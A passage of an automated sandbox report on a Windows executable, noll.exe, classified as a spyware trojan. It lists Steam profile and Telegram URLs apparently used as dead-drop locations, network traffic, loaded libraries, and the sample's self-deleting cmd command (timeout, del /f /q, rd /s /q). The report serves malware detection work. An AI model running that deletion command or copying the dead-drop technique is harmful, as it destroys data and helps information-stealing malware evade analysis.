Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: noll.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305868410.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869I
Source: noll.exe	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/w
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: noll.exe, 00000000.00000003.2285194170.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/F
Source: noll.exe	String found in binary or memory: https://t.me/ae5ed
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed&
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edC
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edg
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edj
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5edm
Source: noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: noll.exe, 00000000.00000003.2305837562.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: noll.exe, 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: noll.exe, 00000000.00000003.2283607721.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000003.2285194170.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, noll.exe, 00000000.00000002.2315238469.0000000002D9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49725 version: TLS 1.2

System Summary

PE file has a writeable .text section

Source: noll.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_0008145B GetCurrentProcess,NtQueryInformationProcess,

0_2_0008145B

Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009C472	0_2_0009C472
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000AD933	0_2_000AD933
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000AD1C3	0_2_000AD1C3
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009950A	0_2_0009950A
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000ADD1B	0_2_000ADD1B
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000ACD2E	0_2_000ACD2E
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_000AD561	0_2_000AD561
Source: C:\Users\user\Desktop\noll.exe	Code function: 0_2_0009B712	0_2_0009B712

Source: C:\Users\user\Desktop\noll.exe	Code function: String function: 000904E7 appears 36 times
Source: C:\Users\user\Desktop\noll.exe	Code function: String function: 00090609 appears 71 times
Source: C:\Users\user\Desktop\noll.exe	Code function: String function: 000847E8 appears 38 times

Source: noll.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/2@3/2

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_000914A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_000914A5

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_00091807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

0_2_00091807

Source: C:\Users\user\Desktop\noll.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199780418869[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6484:120:WilError_03

Source: C:\Users\user\Desktop\noll.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: noll.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\noll.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: noll.exe

ReversingLabs: Detection: 81%

Source: unknown	Process created: C:\Users\user\Desktop\noll.exe "C:\Users\user\Desktop\noll.exe"
Source: C:\Users\user\Desktop\noll.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\noll.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\noll.exe" & rd /s /q "C:\ProgramData\HJDHCFCBGIDG" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\noll.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\noll.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\noll.exe

Code function: 0_2_00098950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,G